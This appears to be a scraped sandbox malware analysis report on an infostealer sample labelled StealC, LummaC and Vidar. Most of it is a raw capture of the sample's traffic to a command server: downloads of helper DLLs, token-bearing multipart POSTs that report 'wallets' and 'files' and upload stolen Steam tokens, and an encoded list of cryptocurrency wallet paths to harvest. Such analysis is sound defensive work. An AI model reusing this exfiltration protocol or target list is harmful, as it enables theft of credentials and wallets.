00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 5, 2024 10:13:55.237098932 CET	95	OUT	GET /746f34465cf17784/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 10:13:55.519002914 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:55 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 5, 2024 10:13:56.323307037 CET	91	OUT	GET /746f34465cf17784/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 10:13:56.609354973 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:56 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 5, 2024 10:13:58.515857935 CET	95	OUT	GET /746f34465cf17784/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 10:13:58.797764063 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:58 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:13:59.196770906 CET	99	OUT	GET /746f34465cf17784/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 10:14:00.094327927 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 5, 2024 10:14:00.094338894 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 27 00 00 02 e0 27 00 00 02 60 2d 00 00 02 e0 32 00 00 02 40 34 00 00 02 70 35 00 00 02 b0 36 00 00 02 28 39 00 00 01 f8 39 00 Data Ascii: 0''`-2@4p56(99;0;;<`==
Nov 5, 2024 10:14:00.094419003 CET	1236	IN	Data Raw: 00 02 20 3e 00 00 02 30 3e 00 00 00 51 3e 00 00 00 96 3e 00 00 00 70 3f 00 00 00 d0 3f 00 00 01 f0 3f 00 00 02 c0 40 00 00 02 70 41 00 00 02 80 44 00 00 01 e0 45 00 00 02 90 4a 00 00 02 40 5a 00 00 00 f0 5a 00 00 02 20 5b 00 00 02 30 5b 00 00 02 Data Ascii: >0>Q>>p???@pADEJ@ZZ [0[`[[\\ \0\@\peeefPj`jpjjjj l0llmn0nPrrs`tttuuPu
Nov 5, 2024 10:14:00.094429016 CET	1236	IN	Data Raw: 17 00 10 38 17 00 10 3c 17 00 10 40 17 00 10 44 17 00 10 48 17 00 10 4c 17 00 10 50 17 00 10 54 17 00 10 60 17 00 10 6c 17 00 10 74 17 00 10 80 17 00 10 98 17 00 10 a4 17 00 10 b8 17 00 10 d8 17 00 10 f8 17 00 10 18 18 00 10 38 18 00 10 58 18 00 Data Ascii: 8<@DHLPT`lt8X\| 04<Lpx Ht0L\p__based(__cdecl__pascal
Nov 5, 2024 10:14:00.094441891 CET	1236	IN	Data Raw: 74 6f 72 27 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f Data Ascii: tor'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbas
Nov 5, 2024 10:14:00.094453096 CET	1236	IN	Data Raw: 38 00 00 5f 5f 69 6e 74 31 36 00 5f 5f 69 6e 74 33 32 00 5f 5f 69 6e 74 36 34 00 5f 5f 69 6e 74 31 32 38 00 00 00 00 3c 75 6e 6b 6e 6f 77 6e 3e 00 00 00 63 68 61 72 31 36 5f 74 00 00 00 00 63 68 61 72 33 32 5f 74 00 00 00 00 77 63 68 61 72 5f 74 Data Ascii: 8__int16__int32__int64__int128<unknown>char16_tchar32_twchar_t__w64 UNKNOWNsigned const volatile`unknown ecsu'union struct class coclass cointerface enum volatile const & && cli::array<
Nov 5, 2024 10:14:00.094470978 CET	848	IN	Data Raw: 00 00 00 68 23 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 f1 00 10 b4 23 00 10 00 00 00 00 00 00 00 00 02 00 00 00 c4 23 00 10 d0 23 00 10 ec 22 00 10 00 00 00 00 20 f1 00 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 b4 23 00 Data Ascii: h# ###" @#<$$$"<@$\L$\$h$"\@L$
Nov 5, 2024 10:14:00.094481945 CET	1236	IN	Data Raw: 45 0c 83 c0 0c 89 45 fc 8b 45 08 55 ff 75 10 8b 4d 10 8b 6d fc e8 3d 18 00 00 56 57 ff d0 5f 5e 8b dd 5d 8b 4d 10 55 8b eb 81 f9 00 01 00 00 75 05 b9 02 00 00 00 51 e8 1b 18 00 00 5d 59 5b c9 c2 0c 00 cc cc cc cc 8b 44 24 0c 53 85 c0 74 52 8b 54 Data Ascii: EEEUuMm=VW_^]MUuQ]Y[D$StRT$3\$t2trt2urW_t2t@u[r3~3tJ2t#2t2t2t_B[B_[B_[B_[
Nov 5, 2024 10:14:00.094558954 CET	212	IN	Data Raw: 70 81 e9 80 00 00 00 f7 c1 80 ff ff ff 75 90 83 f9 20 72 23 83 ee 20 83 ef 20 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 7f 07 f3 0f 7f 4f 10 83 e9 20 f7 c1 e0 ff ff ff 75 dd f7 c1 fc ff ff ff 74 15 83 ef 04 83 ee 04 8b 06 89 07 83 e9 04 f7 c1 fc ff ff ff Data Ascii: pu r# ooNO ututuD$^_tf$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@f
Nov 5, 2024 10:14:00.094568014 CET	1236	IN	Data Raw: 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 5f 8b d1 c1 ea 05 85 d2 74 21 8d 9b 00 00 00 00 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 7f 07 f3 0f 7f 4f 10 8d 76 20 8d 7f 20 4a 75 e5 83 e1 1f 74 30 8b c1 c1 Data Ascii: oPfw`fpJut_t!ooNOv Jut0tutFGIu$ID$^_$++QtFGIutvHuYWVt$L$\|$;v;
Nov 5, 2024 10:14:00.099344969 CET	1236	IN	Data Raw: 0f 7f 4f 10 83 e9 20 f7 c1 e0 ff ff ff 75 dd f7 c1 fc ff ff ff 74 15 83 ef 04 83 ee 04 8b 06 89 07 83 e9 04 f7 c1 fc ff ff ff 75 eb 85 c9 74 0f 83 ef 01 83 ee 01 8a 06 88 07 83 e9 01 75 f1 8b 44 24 0c 5e 5f c3 eb 03 cc cc cc 8b c6 83 e0 0f 85 c0 Data Ascii: O ututuD$^_tf$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJut_t!ooNOv

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:14:01.333813906 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 10:14:01.333813906 CET	1067	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file_name"aGlzdG9yeVxNb
Nov 5, 2024 10:14:02.749027967 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:14:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:14:03.350449085 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDAAFBGDBKJJJKFIIIJ Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 2d 2d 0d 0a Data Ascii: ------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="message"wallets------IIDAAFBGDBKJJJKFIIIJ--
Nov 5, 2024 10:14:04.267973900 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:14:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF
Nov 5, 2024 10:14:04.267983913 CET	1236	IN	Data Raw: 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 Data Ascii: 8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAubG9jYWxzdG9yYWdlfDB8SmF4eCBEZXNrdG9wfDF8XGNvbS5saWJlcnR5LmpheHhcSW5kZXhlZERCXGZpbGVfXzAuaW5kZXhlZGRiLmxldmVsZGJcfCouKnwwfEF0b21pY3wxfF
Nov 5, 2024 10:14:04.267999887 CET	165	IN	Data Raw: 6c 5a 45 52 43 58 47 68 30 64 48 42 7a 58 32 64 31 59 58 4a 6b 59 53 35 6a 62 31 38 77 4c 6d 6c 75 5a 47 56 34 5a 57 52 6b 59 69 35 73 5a 58 5a 6c 62 47 52 69 58 48 77 71 4c 69 70 38 4d 48 78 48 64 57 46 79 5a 47 45 67 52 47 56 7a 61 33 52 76 63 Data Ascii: lZERCXGh0dHBzX2d1YXJkYS5jb18wLmluZGV4ZWRkYi5sZXZlbGRiXHwqLip8MHxHdWFyZGEgRGVza3RvcFxMb2NhbCBTdG9yYWdlXGxldmVsZGJ8MXxcR3VhcmRhXExvY2FsIFN0b3JhZ2VcbGV2ZWxkYlx8Ki4qfDB8

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:14:04.281193018 CET	467	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFIDBFHDBGIDHJJEGHI Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 2d 2d 0d 0a Data Ascii: ------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="message"files------FBFIDBFHDBGIDHJJEGHI--
Nov 5, 2024 10:14:05.214395046 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:14:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ByVoN4bhSU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAEBAKKJKKEBKFIDBFBA

C:\ProgramData\ECGIIIDAKJDHJKFHIEBFCGHCGH

C:\ProgramData\FIDHIEBAAKJDHIECAAFH

C:\ProgramData\GHDHDBAE

C:\ProgramData\GIJEGDAKEHJECAKEGDHJ

C:\ProgramData\HDAKFCGIJKJKFHIDHIIIEBGCBF

C:\ProgramData\JJECFIEC

Windows Analysis Report
ByVoN4bhSU.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:14:05.240462065 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFCFBKFCFCBGDGIEGH Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="file"------CGCFCFBKFCFCBGDGIEGH--
